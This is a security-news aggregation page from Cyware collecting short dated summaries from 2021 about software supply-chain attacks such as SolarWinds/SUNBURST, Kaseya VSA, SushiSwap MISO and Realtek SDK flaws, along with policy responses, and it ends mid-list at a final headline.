Go to listing page

Live Updates: Supply-Chain Attacks - SolarWinds/Solorigate (SUNBURST), Kaseya VSA, and More

Live Updates: Supply-Chain Attacks - SolarWinds/Solorigate (SUNBURST), Kaseya VSA, and More

Share Blog Post

An alleged Russia-backed hacking group is believed to have targeted and breached the U.S. Departments of Treasury and Commerce. According to Reuters, the breach originated from a supply chain attack that leveraged Orion - the widely-used network monitoring tool from SolarWinds, an IT company that supports several federal agencies and the U.S. military. Last week, cybersecurity company FireEye had reported a similar attack carried out via the SolarWinds platform that led to the compromise of its “red teaming” tools. It is believed that a large number of organizations that use this software might be at risk. The malware used in this widespread "UNC2452" campaign is being tracked by several names including Solorigate and SUNBURST.

Cyware has created this resource to collect and share live alerts on this campaign, impacted organizations as reported in the media, indicators of compromise (IOCs), and other relevant threat intelligence. We are actively working to keep this page updated and accurate in order to ensure that it is timely and relevant to as many people as possible.

Solutions and Countermeasures


Advisories

Indicators of Compromise (IOCs)

Threat Response Workflow

Killswitch 

Network Auditing Tool

_______________________________________________________________________________________

(Sept 17, 2021)

SushiSwap's MISO launchpad hit by $3 million supply chain attack

SushiSwap's chief technology officer says the company's MISO platform has been hit by a software supply chain attack. CTO Joseph Delong announced that an auction on MISO launchpad had been hijacked via a supply chain attack. An "anonymous contractor" with the GitHub handle AristoK3 and access to the project's code repository had pushed a malicious code commit that was distributed on the platform's front end.


_______________________________________________________________________________________

(Sept 16, 2021)

Azure zero-day flaws highlight lurking supply-chain risk

Four Microsoft zero-day vulnerabilities in the Azure cloud platform’s Open Management Infrastructure (OMI)  show that OMI represents a significant security blind spot. Dubbed OMIGOD, a series of vulnerabilities in the Open Management Infrastructure used in Azure on Linux demonstrate hidden security threats and affect thousands of Azure customers and millions of endpoints.


_______________________________________________________________________________________

(Sept 15, 2021)

Why open-source software supply chain management is worse than you think

The seventh annual State of the Software Supply Chain Report has revealed that a majority of respondents use an ad hoc approach to software supply chain management for most parts of the process, except for remediation and inventory. The analysis revealed that 29% of popular open-source projects contain at least one known security vulnerability compared to only 6.5% of less popular OSS projects. 


_______________________________________________________________________________________

(Sept 15, 2021)

Supply chain attacks against the open-source ecosystem soar by 650%

The last year has seen a massive rise in the number of software supply chain attacks aimed at upstream public repositories, a new report has revealed. According to Sonatype’s annual State of the Software Supply Chain Report, such attacks numbered more than 12,000 – a 650% rise in 2020, which itself revealed a 430% increase in 2019.

Ref - PortSwigger 

_______________________________________________________________________________________

(Sept 15, 2021)

Execs concerned about software supply chain security, but not taking action

According to ENISA, supply chain attacks, such as SolarWinds, Codecov, and Kaseya, are expected to increase by a factor of four in 2021. Executives are clearly much more concerned about their vulnerability to software supply chain attacks and aware of the urgent need for action.


_______________________________________________________________________________________

(Sept 15, 2021)

Supply chain attacks on open source repositories are reaching new highs

There has been a whopping 650% year-over-year increase in supply chain attacks aimed at upstream open-source public repositories, according to a new report. Interestingly, despite the risk, cybersecurity company Sonatype’s seventh annual State of the Software Supply Chain Report notes strong growth in the supply and demand of open-source software.

Ref - TechRadar 

_______________________________________________________________________________________

(Sept 15, 2021)

What the Kaseya attack can teach local governments about preventing third-party data breaches

There are ways to minimize, or at the very least mitigate, the risks associated with supply chain attacks. In a recent report on the state of third-party security, 44% of organizations surveyed said they had experienced a third-party data breach within the last 12 months. Of those organizations, 74% attributed the breach to giving too much privileged access to third parties.


_______________________________________________________________________________________

(Sept 15, 2021)

Who bears the brunt of supply chain attacks?

A survey by Venafi shows that most of the Executives are not taking action that will drive change. While 94% of executives believe there should be clear consequences for software vendors that fail to protect the integrity of their software build pipelines, most have done little to change the way they evaluate the security of the software they purchase and the assurances they demand from software providers.

Ref - TechHQ 

_______________________________________________________________________________________

(Sept 13, 2021)

Ways to improve cyber resilience against ransomware, supply chain attacks

There are some common vital steps we can all take to protect sensitive data. This includes a renewed focus on database security, collaborating across the private/public sector, enabling continuous monitoring, mitigation and testing, training and retaining cybersecurity experts, and when thinking about security assuming that agencies will come under attack.

Ref - GCN

_______________________________________________________________________________________
 
(Sept 13, 2021)

Can advanced code-signing help end supply chain attacks?

The software company signs every piece of code with the private key, and recipients check the validity with the public key. Unfortunately, once hackers have access to a code-signing key, either through theft or by gaining access to a build server and tricking the system, they can easily disguise their malware. They only need one piece of signed code to gain back-door access to networks, and there’s a vast range of potential victims. 


_______________________________________________________________________________________

(Sept 10, 2021)

Securing the supply chain in the age of hybrid work

In today’s connected world, everyone—from device manufacturers to consumers—has a responsibility to improve cybersecurity by working together. Companies must seek out vendors that can provide security assurance, as well as realize the need to upgrade their security posture to maintain customer trust and prevent cyber disasters. The more informed an organization is about its devices, the stronger its supply chain security posture will be.

Ref - SDCExecutive 

_______________________________________________________________________________________

(Sept 8, 2021)

Security at scale in the open-source supply chain

Instead of the one-by-one approach to patching, security professionals need to start thinking about securing entire classes of vulnerabilities. It’s true that there is no current catch-all mechanism for such efficient action. But researchers can begin to work together to create methodologies that enable security organizations to better prioritize vulnerability risk management (VRM) instead of filing each one away to patch at a later date.

Ref - Rapid7 

_______________________________________________________________________________________

(Sept 7, 2021)

Combatting defense supply chain and critical infrastructure vulnerability with AI

Assessing defense supply chain risk boils down to understanding the relationships of the contracting organizations that support the government’s mission. Using advanced technology, including artificial intelligence and machine learning processes, supply chains can be mapped and potential gaps or pain points identified, from connections with sanctioned parties and adversary-controlled entities to distribution bottlenecks and sole-source suppliers.

Ref - NextGov 

_______________________________________________________________________________________

(Sept 4, 2021)

Microsoft says Chinese hackers were behind SolarWinds Serv-U SSH 0-day attack

Microsoft has shared technical details about a now-fixed, actively exploited critical security vulnerability affecting SolarWinds Serv-U managed file transfer service that it has attributed with "high confidence" to a threat actor operating out of China. In mid-July, the Texas-based company remedied a remote code execution flaw (CVE-2021-35211) that was rooted in Serv-U's implementation of the Secure Shell (SSH) protocol.


_______________________________________________________________________________________

(Sept 2, 2021)

Autodesk was one of the 18,000 firms breached in SolarWinds attack

Autodesk, makers of computer-aided design (CAD) software for manufacturing, has told the US stock market it was targeted as part of the supply chain attack on SolarWinds' Orion software. In a filing with the American Stock Exchange Commission, Autodesk said it had identified a compromised server in the wake of public reporting of the SolarWinds breach.

Ref - The Register 

_______________________________________________________________________________________

(Sept 2, 2021)

What Biden’s cybersecurity executive order means for supply chain attacks

One major outcome of the executive order is baselining. People may disagree what would constitute ‘critical’, but at least there is a formal definition in the books now. Critical software as mentioned in the executive order is defined as any software that has, or has direct software dependencies upon, one or more components with at least one of the given attributes.


_______________________________________________________________________________________

(Sept 2, 2021)

A deep-dive into the SolarWinds Serv-U SSH vulnerability

Several weeks ago, Microsoft detected a 0-day remote code execution exploit being used to attack the SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributed the attack with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.

Ref - Microsoft
 
_______________________________________________________________________________________

(Sept 1, 2021)

How to stop supply chain attacks in their tracks

While agencies like the FBI and CISA have been warning for some time that MSPs are likely targets of advanced persistent threats (APTs), the Kaseya attack seems to have crossed a threshold. The problem is a significant security challenge, and one that some think only vendors can solve.


_______________________________________________________________________________________

(Aug 31, 2021)

A data breach may be lurking in your software supply chain

The software supply chain is clearly an increasing target for intrusion. And that’s exactly where a lot of sensitive data resides. The unfortunate reality is that sensitive information in non-prod environments goes largely unprotected. Recent research shows 56% of enterprise customers don’t anonymize sensitive data in test environments.


_______________________________________________________________________________________

(Aug 31, 2021)

Cyberattacks use Office 365 to target supply chain

Supply chain attacks starting in Office 365 can take on many different forms. For instance, spear phishers can use a compromised Office 365 account to scout out a targeted employee’s ongoing emails. They can then use what they learn to go after vendors and suppliers with business email compromise fraud attacks.


_______________________________________________________________________________________

(Aug 30, 2021)

How executive order requirements will change the scope of business

It is anticipated that the technical requirements under the EO will be applied broadly across the software industry. Each software vendor will have to compete commercially alongside the companies that are directly subject to the EO’s rules. Failing to meet the increased security and transparency requirements that the EO will impose will, for many, translate into a competitive disadvantage in the marketplace.


_______________________________________________________________________________________

(Aug 30, 2021)

How to fix the weakest link in cyber security

Many small and medium-sized businesses (SMBs) might think they are immune from cyber attacks. However, recent research shows that is no longer the case. Almost a third (28%) of data breaches in 2020 involved small businesses, and more than 22% of SMBs have suffered a security breach due to a remote worker since the beginning of the COVID-19 outbreak.

Ref - IT Pro

_______________________________________________________________________________________

(Aug 27, 2021)

Supply chain cyber security is only as strong as the weakest link

A primary method used by criminals to attack supply chains is impersonation, which can be remarkably sophisticated. Cybercriminals can spend months stalking employees’ social media accounts and company press releases in order to work out details of a supply chain, deducing where they might insert themselves to fraudulently divert invoices or encourage employees to engage with phishing scams.


_______________________________________________________________________________________

(Aug 27, 2021)

A new threat is coming from inside Docker container images

Aqua Security's threat research arm, Team Nautilus, has found five images accounting for a whopping 120,000 pulls by unsuspecting users. Team Nautilus is further warning that the malicious Docker images could be part of a larger software supply chain attack with its eyes on disrupting cloud-native environments.


_______________________________________________________________________________________

(Aug 27, 2021)

Cyber experts seek clarity on the NIST supply chain framework

Cyber experts agree a technology supply chain security framework developed by the National Institute of Standards and Technology will be a useful tool for agencies and industry. They are less sure about what it will look like. The prevailing theory is the new framework will focus primarily on the software supply chain —in light of the recent Microsoft Exchange server attacks, the Kaseya ransomware attack, and the SolarWinds breach.

Ref - Fed Scoop 

_______________________________________________________________________________________

(Aug 26, 2021)

White House unveils supply chain, new security initiatives

The Biden administration unveiled a new package of supply chain and critical infrastructure security initiatives following a meeting at the White House with about 25 tech, banking, insurance, and infrastructure executives. The initiatives feature a pledge by several companies, including tech giants Microsoft, Google and IBM, and insurers Travelers and Coalition, and the U.S. NIST, to create a framework to build more security into the nation's technology supply chain to help ensure its integrity, according to a fact sheet released by the White House.


_______________________________________________________________________________________

(Aug 26, 2021)

Realtek flaw exposes dozens of brands to supply chain attacks

German security firm IoT Inspector reports that the Realtek bug, tracked as CVE-2021-35395, affects over 200 Wi-Fi and router products from 65 vendors, including Asus, Belkin, China Mobile, Compal, D-Link, LG, Logitec, Netgear, ZTE, and Zyxel. The flaw is located in a Realtek software developer kit (SDK) and is currently under attack from a group using a variant of the IoT malware, Mirai.

Ref - ZDNet 

_______________________________________________________________________________________

(Aug 26, 2021)

Cybersecurity professor works to close the door on hackers

Santiago Torres Arias, an assistant professor of electrical and computer engineering at Purdue, said a cumulative increase of 500% in the number of software supply chain compromises is giving hackers the weak link they need to attack a system. Torres Arias said that in supply chain security, hackers will search to find that one program in a chain of software that is vulnerable and hacks it.


_______________________________________________________________________________________

(Aug 26, 2021)

Apple: It's time to bolster supply chain security

Apple announced it will establish a new program to drive continuous security improvements throughout the technology supply chain. As part of that program, Apple will work with its suppliers - including more than 9,000 in the United States - to drive the mass adoption of multi-factor authentication, security training, vulnerability remediation, event logging, and incident response.


_______________________________________________________________________________________

(Aug 26, 2021)

Google - Updates on collaboration with NIST to secure the software supply chain

Google participated in President Biden’s White House Cyber Security Summit where it shared recommendations to advance the administration’s cybersecurity agenda. This included its commitment to invest $10 billion over the next five years to expand zero-trust programs, help secure the software supply chain, and enhance open-source security.

Ref - Google Blogs 

_______________________________________________________________________________________

(Aug 26, 2021)

Taking control of cyber attacks

Organizations, as well as supply chains, have been blind-sided with new, sophisticated, and frequent tactics, causing CXOs and IT teams to scramble for protection and remediation. It may seem that cyber adversaries are running with the ball unobstructed toward the end zone, but it’s time to block and tackle them before they get yet another touchdown. 

Ref - IBTimes 

_______________________________________________________________________________________

(Aug 26, 2021)

How does PCI DSS prevent supply-chain attacks

The PCI Council recognized the growing level of risk exposure and so, in its PCI DSS 3.2 iteration highlighted the significance of mitigating and management of the third-party risk. The PCI DSS requirement calls for measures ensuring compliance throughout the data supply chain.

Ref - ECCouncil 

_______________________________________________________________________________________

(Aug 25, 2021)

Apple, Microsoft and Amazon chiefs to meet Biden over critical infrastructure cyber attacks

US President Joe Biden has invited Apple CEO Tim Cook, Microsoft CEO Satya Nadella, and Amazon president and CEO Andy Jassy to the White House to discuss how the private sector can help combat ransomware and software supply chain attacks.

Ref - MSN

_______________________________________________________________________________________

(Aug 24, 2021)

Supply chain vulnerability in cloud connectivity platform threatens 83 Million IoT devices

A supply chain vulnerability in the ThroughTek “Kalay” network, a cloud-based communications platform used by an estimated 83 million Internet of Things (IoT) devices, could allow for remote compromise and control to include monitoring audio and video feeds and exposing passwords.

 
_______________________________________________________________________________________

(Aug 24, 2021)

Supply chain attacks - vendors are at risk

Supply chain attacks piggyback legitimate processes to gain uninhibited access into a business's ecosystem. This attack begins with infiltrating a vendor's security defenses. This process is usually much simpler than attacking a victim directly due to the unfortunate myopic cybersecurity practices of many vendors.

Ref - Upguard 

_______________________________________________________________________________________

(Aug 23, 2021)

SSDF: The Key to Defending Against Supply Chain Cyberattacks

One of the best modern ways to combat the supply chain cyberattacks is to integrate a secure software development framework (SSDF) into a vendor’s software development life cycle (SDLC). The SSDF provides software vendors with a framework by which they can implement security measures and cut down on cyberattacks.

 
_______________________________________________________________________________________

(Aug 20, 2021)

A year of supply chain attacks: Ways to protect SDLC

Developers must make sure that any third-party pieces used by them don’t have security or compliance gaps, such as an unpatched critical vulnerability, malware, or a misconfigured setting. Otherwise, their software can put employees and customers at risk for security and compliance breaches. In addition, it is said that lack of visibility into the makeup of commercial and open-source software can be improved with software bills of materials (SBOMs).

Ref - JFrog 

_______________________________________________________________________________________

(Aug 20, 2021)

How to protect supply chains from ransomware attacks

Supply chains critical to the energy, food, and IT infrastructures are increasingly at risk, and threat actors are coming up with more sophisticated ways to exploit vulnerabilities within these supply chains. Because of this, traditional cybersecurity tactics are no longer enough, and this applies not just to large and prominent organizations but to smaller businesses as well.


_______________________________________________________________________________________

(Aug 18, 2021)

Lifting the veil on cyber vulnerabilities in government supply chain pipelines

It is important that the security team should be helping to assess the safety of third-party additions to the tech stack, but decisions can be made based on a business need with little choice among solutions. At this point, it can be a trust exercise. Does the vendor care about security as much as your company does? And can the vendor actually assess the risks as only you could understand them, as well as the assets you need to protect?


_______________________________________________________________________________________

(Aug 18, 2021)

Supply chain attacks on IoT - Million+ devices are vulnerable

Taiwanese chip designer Realtek has warned of four recent vulnerabilities in three SDKs in its WiFi modules. Realtek also published an advisory regarding those flaws used in almost 200 products made by multiple vendors. The vulnerabilities allow remote access without authentication by the attacker. Also, the flaws can lead to service denial, device crashes, inject arbitrary commands, and finally gain complete control of the device's highest level of privilege.

Ref - Medium

_______________________________________________________________________________________

(Aug 18, 2021)

Iranian hackers target several Israeli organizations with supply-chain attacks

IT and communication companies in Israel were at the center of a supply chain attack campaign spearheaded by an Iranian threat actor that involved impersonating the firms and their HR personnel to target victims with fake job offers. The attacks have been linked to a hacker group called Siamesekitten (aka Lyceum or Hexane) that has primarily singled out oil, gas, and telecom providers in the Middle East and in Africa at least since 2018


_______________________________________________________________________________________

(Aug 18, 2021)

Software composition analysis can help protect the software supply chain

Protecting the software supply chain is a multifaceted challenge that includes code signing, identity, and access management, policy and software composition analysis (SCA). SCA has always played a role in protecting the software supply chain, historically by identifying vulnerabilities and licensing risks in open source libraries and advising security and development teams on upgrade paths.

Ref - Forrester

_______________________________________________________________________________________

(Aug 18, 2021)

Supply chain attacks are closing in on MSPs

Like a technology that advances through state-sponsored R&D but then becomes available to a wider public, recent supply chain attack techniques were honed by state-backed actors but have now been adopted by more run-of-the-mill ransomware actors. This is bad news for MSPs. While agencies like the FBI and CISA have been warning for some time that MSPs are likely targets of advanced persistent threats (APTs), the Kaseya attack seems to have crossed a threshold.

Ref - Webroot 

_______________________________________________________________________________________

(Aug 17, 2021)

How to accelerate U.S. supply chain and security innovation

Dr. Tommy Gardner, Chief Technology Officer of HP Federal, believes a proactive mindset that bridges the digital divide, recruits top talent and implements the right policies is needed for the U.S. to achieve success and remain competitive on a global scale. According to him, a national strategy for critical technologies can shape the industries of the future as well as address national security and global challenges.

 
_______________________________________________________________________________________

(Aug 16, 2021)

ENISA predicts fourfold increase in software supply chain attacks in 2021

The European Union Cybersecurity Agency (ENISA) warns of increasing supply chain attacks in 2021 as advanced persistent threat actors (APTs) employ more sophisticated techniques exceeding targeted attacks. The agency studied 24 supply chain attacks from January 2020 to July 2021 and found that strong security protection is no longer effective in defending against these forms of cyber-attacks.

Ref - CPO Magazine 

_______________________________________________________________________________________

(Aug 16, 2021)

5 Ways to defend against supply chain cyberattacks

Security Intelligence recommends five keys to start proactively reducing supply chain attack risk: Inform developers about cyberattacks, Monitor open-source projects, Implement zero trust, Use built-in data protection and Focus on third-party risks.


_______________________________________________________________________________________

(Aug 16, 2021)

Devices from many vendors can be hacked remotely due to flaws in Realtek SDK

A large number of IoT systems could be exposed to remote hacker attacks due to serious vulnerabilities found in software development kits (SDKs) provided to device manufacturers by Taiwan-based semiconductor company Realtek. The list of impacted manufacturers and vendors includes ASUS, Belkin, D-Link, Huawei, LG, Logitech, Netgear, ZTE, and Zyxel.


_______________________________________________________________________________________

(Aug 16, 2021)

Do open-source supply chains leave security gaps in organizations?

Infiltrating open source libraries can also be a more covert approach than directly attacking organizations — if it’s already part of a trusted supply chain, its malicious activity will be detected. Attacking an organization directly is tricky and will typically be harder and yield slower and fewer results.


_______________________________________________________________________________________

(Aug 16, 2021)

Companies need to finally embrace zero-trust

The industry has long viewed patching as an industry best practice and fundamental to any mature approach to cybersecurity. But what incidents like SolarWinds, Exchange, and Colonial Pipeline taught us was that organizations need to supplement their detection-based cybersecurity solutions – endpoint detection and response (EDR) and firewalls – and retroactive patch with a proactive cybersecurity framework that fills the gap in the middle.


_______________________________________________________________________________________

(Aug 14, 2021)

Software’s supply chain security problem

Software Supply Chain attacks break the current model of Cyber Security. “Trusted” partners now have become an increasing source of risk & compromise. Attacks can involve whitelisted, or perceived legitimate, software that passes basic and advanced security checks. These attacks can have valid digital signatures or code signing, a perceived “stamp of approval” from the vendor that the backdoored software is legitimate.

Ref - Medium 

_______________________________________________________________________________________

(Aug 13, 2021)

SolarWinds 2.0 could ignite financial crisis

This incident confirms that the next great financial crisis could come from a cyberattack,” superintendent of financial services Linda A. Lacewell said in a press release following the DFS’ investigation of New York’s financial services industry’s response to the supply-chain attack. Seeing hackers get access to thousands of organizations in one stroke underscores that cyberattacks threaten not just individual companies but also the stability of the financial industry as a whole. 


_______________________________________________________________________________________

(Aug 13, 2021)

Supply chain attacks using container images

Aqua Security’s threat research team has uncovered several supply chain attacks that use malicious container images to compromise their victim. These five container images were found on Docker Hub. The images hijack organizations’ resources to mine cryptocurrency and can be used as part of a supply chain attack targeting cloud native environments.

Ref - AquaSec 

_______________________________________________________________________________________

(Aug 12, 2021)

How do supply chain attacks work?

Supply chain attacks are a new type of threat targeting software developers and suppliers. The goal is to access source code, create processes, or update mechanisms by infecting legitimate apps to distribute malware. Attackers are looking for insecure network protocols, unprotected server infrastructures, and insecure coding practices. They interrupt, change source code and hide malware in build and update processes.

Ref - Microsoft 

_______________________________________________________________________________________

(Aug 12, 2021)

Most supply chain attacks target supplier’s code

According to the European Union Agency for Cybersecurity’s (ENISA) Threat Landscape for Supply Chain Attacks, 62% of supply chain attacks use malware as a technique. The report examined 24 supply chain attacks documented from January 2020 to early 2021. About 50% of the attacks were attributed to well-known Advanced Persistent Threat (APT) groups by the security community. The report also mentioned that strong security protection is no longer adequate for enterprises when attackers have already targeted suppliers. 

Ref - Trend Micro 

_______________________________________________________________________________________

(Aug 12, 2021)

12-Year-old router vulnerability discovered exposing millions of devices for supply chain risks

Tenable security researchers discovered a 12-year router vulnerability that could allow an attacker to bypass authentication and enable a root BusyBox shell on telnet. The path traversal vulnerability CVE-2021-20090 originates from Arcadyan’s firmware used in various router brands. The vulnerability exists in the supply chain of at least 20 models from at least 17 vendors in 11 countries, including the U.S., Japan, Germany, Australia, Mexico, and New Zealand.

Ref - CPO Magazine 

_______________________________________________________________________________________

(Aug 12, 2021)

Current Security Trends - software supply chain on radar

There are three areas executives can focus on to increase visibility into software supply chain security to help prevent security breaches. A leap To DevSecOps, gaining software transparency, and embracing a continuous security culture.

Ref - Forbes 

_______________________________________________________________________________________

(Aug 12, 2021)

Supply chain is the target for cybercriminals

The 2021 Webroot BrightCloud threat report has confirmed what many in the managed services world already know – that they are firmly in the sights of malware attacks. The management of companies and enterprises industry has shown the most significant increase in malware infections – 57% versus the global average. This highlights the fact that technology supply chains are under attack.


_______________________________________________________________________________________

(Aug 11, 2021)

Threat alert: Supply chain attacks using container images

Team Nautilus, Aqua Security’s threat research team, has uncovered several supply chain attacks that use malicious container images to compromise their victim. These five container images were found on Docker Hub, which we scan daily for signs of malicious activity. The images hijack organizations’ resources to mine cryptocurrency and can be used as part of a supply chain attack targeting cloud native environments.

Ref - AquaSec

_______________________________________________________________________________________

(Aug 10, 2021)

Black Hat 2021: Zero-days, ransoms, and supply chains

During Black Hat 2021, Corellium COO Matt Tait highlighted that there was a significant rise in the number of zero-days identified and exploited in the wild, stolen zero-days, and supply chain assaults. Tait described supply chain assaults as a whole different type of cybercrime danger. The entire economics of mass exploitation, he explains, is turned upside down because of supply chain attacks. 


_______________________________________________________________________________________

(Aug 10, 2021)

Cyber-industry needs to get back to basics

There needs to be a much greater emphasis on getting the basics right in cybersecurity, according to Robert Hannigan, chairman of BlueVoyant, speaking during his Keynote address on day one of the Infosecurity Europe virtual conference, which took place from 13-15 July 2021. While the most critical vendors are generally the focus for large businesses, the less well-known suppliers in the ecosystem are typically the most vulnerable. This fact is because that might be a small company that has one person doing cybersecurity, if anyone.

 
_______________________________________________________________________________________

(Aug 9, 2021)

3 Strategies to secure the digital supply chain

Corporate leaders and IT teams can take three steps to prioritize and remediate vulnerabilities and forestall supply chain cyberattacks. IT managers should rely more on automated tools to fix simple vulnerabilities. Businesses should conduct a cost-benefit analysis for vulnerability patching. And thirdly, procurers should demand that critical technology vendors implement “hot patching.”

Ref - HBR

_______________________________________________________________________________________

(Aug 9, 2021)

How to strengthen supply chain security

As demonstrated by the recent ransomware cybersecurity attacks, everyone suffers when a supply chain is compromised: buyers, suppliers, and users. The pace and magnitude of these and other attacks are increasing. It is clear that supply chain security needs strong oversight and control to ensure security.


_______________________________________________________________________________________

(Aug 9, 2021)

Kaseya could be the turning point for supply chain attacks

In the aftermath of Kaseya, this has been reminded that complacency can exact a terrible price. With the risk of harm no longer limited to sprawling enterprises with deep pockets, the incident should trigger new security discussions across IT departments of every size.


_______________________________________________________________________________________

(Aug 9, 2021)

Takeaways on the state of OT security and the cyber supply chain

Ensuring the integrity of the cyber supply chain is a significant challenge for OT security professionals. Supply chains continue to grow, and a recent survey indicates that organizations have an average of 27 third parties as part of their cyber supply chains, which span across different types of IT providers, OT providers, and channel partners. Many of these third parties have access to internal assets, a fact that has serious security implications. 

Ref - Fortinet 

_______________________________________________________________________________________

(Aug 9, 2021)

Kaseya VSA ransomware attack: A bombshell supply-chain hit

Large ransomware or other such attacks are promulgated and perpetuated by hackers through /third-party vendors critical to infrastructure and/or business operations. It is important to manage risk from third-party vendors by establishing a risk management process and a baseline for secure operations. Essentially that means developing and maintaining a risk register using standards-based assessments (NIST, ISO, SIG, CAIQ).


_______________________________________________________________________________________

(Aug 7, 2021)

11 Tactics to prevent supply chain attacks

Even though the SolarWinds breach was the most sophisticated cyberattack in history, there are still defense tactics organizations can implement to significantly strengthen the digital supply chain. This includes implementing Honeytokens, securing Privileged Access Management, implementing a Zero Trust Architecture, identifying all potential insider threats, and protecting vulnerable resources, etc.

Ref - Upguard

_______________________________________________________________________________________

(Aug 6, 2021)

Protecting Canada's energy supply chains from cyber threats

The Honourable Seamus O'Regan Jr., Minister of Natural Resources, today announced $407,000 in funding for the University of Waterloo to develop an enhanced cybersecurity system to protect Canada's critical energy infrastructure. The innovative hardware assurance system will be developed by the University of Waterloo and can detect compromised parts and devices, ensuring the safety and reliability of Canada's energy delivery by mitigating risks in its supply chain.

Ref - Yahoo 

_______________________________________________________________________________________

(Aug 6, 2021)

Norsk Hyrdo’s hack highlights the need for supply chain cybersecurity

According to a recent report, when Norsk Hydro was targeted by a cyberattack in 2019, instead of paying the hackers who held their thousands of servers and PCs hostage, the company decided to consult cybersecurity experts to inspect 30,000 employee credentials and get to the root of the attack. The final culprit? An employee had opened an infected email. This approach may have left Norsk Hydro in a better position to fend off future supply-chain hacks, but it still cost the company over $70 million. It also taught them and can teach other organizations, a valuable lesson: Be prepared.


_______________________________________________________________________________________

(Aug 5, 2021)

Why you should be worried about your supplier change vendors

Software supply chain attacks target either the source code, update mechanism, or build processes of vendor software. A victim could be compromised by several vectors, including third-party software updates, the malware installed on connected devices, for example, external hard drives, cameras, phones, etc., and application installers.

Ref - Upguard 

_______________________________________________________________________________________

(Aug 5, 2021)

DevOps tools proliferation – A whole new world of vulnerabilities and supply chain attacks

The recent series of supply chain attacks affected tens of thousands of companies. Nowadays, CI/CD pipelines form the backbone of modern-day DevOps operations, and as we see this trend continue, we cannot ignore the urgency in protecting customer’s development environments from these pervasive attacks.


_______________________________________________________________________________________

(Aug 5, 2021)

Supply chain attacks are destined to escalate

The only way to minimize the supply chain attacks is for software platform vendors to fix the underlying technology. International or national governments can't solve the issue. Platform vendors have to step in. For Windows, that means tightening up user privileges into one that developers use so if an app gets compromised, malware's impact is reduced.

Ref - DarkReading 

_______________________________________________________________________________________

(Aug 5, 2021)

Supply chain security remains a key puzzle

Malicious actors have successfully exploited DNS vulnerabilities on three major cloud providers, including AWS Route 53. “The root cause of the problem is the non-standard implementation of DNS resolvers that, when coupled with specific unintended edge cases on the DNS service provider’s side, cause major information leakage from internal corporate networks.

Ref - Toolbox

_______________________________________________________________________________________

(Aug 4, 2021)

Major supply chain attacks in 2021

This year alone, there have been several newsworthy attacks that deserve some attention. In a couple of stories since Kaseya and SolarWinds have been done ad nauseam at this point. Instead, we’ll pull together a couple of significant case studies to walk you through what we know now after time has passed and hopefully glean some lessons from them.


_______________________________________________________________________________________

(Aug 4, 2021)

Detecting and managing supply chain cyber risk

To actively manage supply chain risks, recommendations such as using trusted networks, information sharing, scenario planning, and quantification metrics have been broadly accepted by organizations as reputed as the World Economic Forum. These may be true, but don’t solve the problem unless deployed by all stakeholders – and that’s a tall order. A rising tide of improved risk management must start from within.

Ref - TrustWave 

_______________________________________________________________________________________

(Aug 4, 2021)

Supply chain attacks from a managed detection and response perspective

Supply chain attacks are difficult to track because the targeted organizations often do not have full access to what’s going on security-wise with their supply chain partners. This can often be exacerbated by security lapses within the company itself. Even if third-party vendors are known to be trustworthy, security precautions should still be deployed in case there are compromised accounts or even insider threats.

 
_______________________________________________________________________________________

(Aug 4, 2021)

Supply chain attacks, IoT threats on tap for Black Hat 2021

The 2020 SolarWinds attack, in which software updates for the Orion IT management platform were poisoned, brought the idea of supply chain infections into the public light. When combined with the rise in sophisticated ransomware gangs, supply chain attacks could well become the most dangerous threat facing enterprises.


_______________________________________________________________________________________

(Aug 4, 2021)

Protecting SMBs against Kaseya supply chain, zero-day, and ransomware attacks

To breach on-premise Kaseya VSA servers, REvil used a zero-day vulnerability that was in the process of being fixed. The vulnerability had been previously disclosed to Kaseya by security researchers from the Dutch Institute for Vulnerability Disclosure, and Kaseya was validating the patch before rolling it out to customers. However, the REvil ransomware gang was one step ahead of Kaseya and used the vulnerability to carry out their attack.

Ref - Check Point 

_______________________________________________________________________________________

(Aug 4, 2021)

Supply chain attacks and mass compromises are changing vendor relationships

Supply chain attacks can dramatically simplify the work that threat actors have to do around target selection, scanning the attack surface, privilege escalation, and lateral movement; things are often harder, more complex, and come with higher costs in more traditional or targeted intrusions.

Ref - SC Magazine 

_______________________________________________________________________________________

(Aug 3, 2021)

Four-fold increase in software supply chain attacks predicted in 2021 – report

The European Union has forecast there will be four times more software supply chain attacks in 2021 than there were in 2020, as cybercriminals shift to larger, cross-border targets. Among the findings, ENISA revealed that around 50% of the supply chain attacks studied were attributed to known APT groups, while 42% were not attributed to a particular source.

Ref - PortSwigger 

_______________________________________________________________________________________

(Aug 3, 2021)

What constitutes a software supply chain attack?

It’s important to remember that dependency hijacking or namespace confusion attacks occur automatically and without relying on a developer making a typographical error. This occurs as soon as a malicious dependency is pulled into the developer’s build. Dismissing these incidents as not a software supply chain issue because they lack a major security outcome isn’t wise.

Ref - SonaType 

_______________________________________________________________________________________

(Aug 3, 2021)

Supply chain attacks are getting worse, and you are not ready for them

The European Union Agency for Cybersecurity (ENISA) has analyzed 24 recent software supply chain attacks and concluded that strong security protection is no longer enough. It notes 11 of the supply chain attacks were conducted by known APT groups. ENISA focuses on APT supply chain attacks and notes that while the code, exploits, and malware was not considered "advanced", the planning, staging, and execution were complex tasks.

Ref - ZDNet 

_______________________________________________________________________________________

(Aug 3, 2021)

Constant review of third-party security is critical as ransomware threat climbs

Lulled into complacency, businesses face risks of supply chain attacks even after they have done their due diligence in assessing their third-party suppliers' security posture before establishing a partnership. There is a need for continuous review of all touchpoints across their supply chain, especially those involving critical systems and data.

Ref - ZDNet

_______________________________________________________________________________________

(Aug 2, 2021)

CISA announces renewal of the ICT supply chain risk management task force

The CISA has announced the extension of the Information and Communications Technology (ICT) Supply Chain Risk Management (SCRM) Task Force to July 31, 2023. The Task Force, chaired by CISA and the IT and Communications Sector Coordinating Councils, is a public-private partnership composed of a diverse range of representatives from large and small private sector organizations charged with identifying challenges and devising workable solutions and recommendations for managing risks to the global ICT supply chain.

Ref - CISA

_______________________________________________________________________________________

(Aug 2, 2021)

PyPI Python package repository patches critical supply chain flaw

The maintainers of Python Package Index (PyPI) last week issued fixes for three vulnerabilities, one among which could be abused to achieve arbitrary code execution and take full control of the official third-party software repository. The security weaknesses were discovered and reported by Japanese security researcher RyotaK.

 
_______________________________________________________________________________________

(Aug 2, 2021)

Today’s supply chain attacks are changing enterprise security

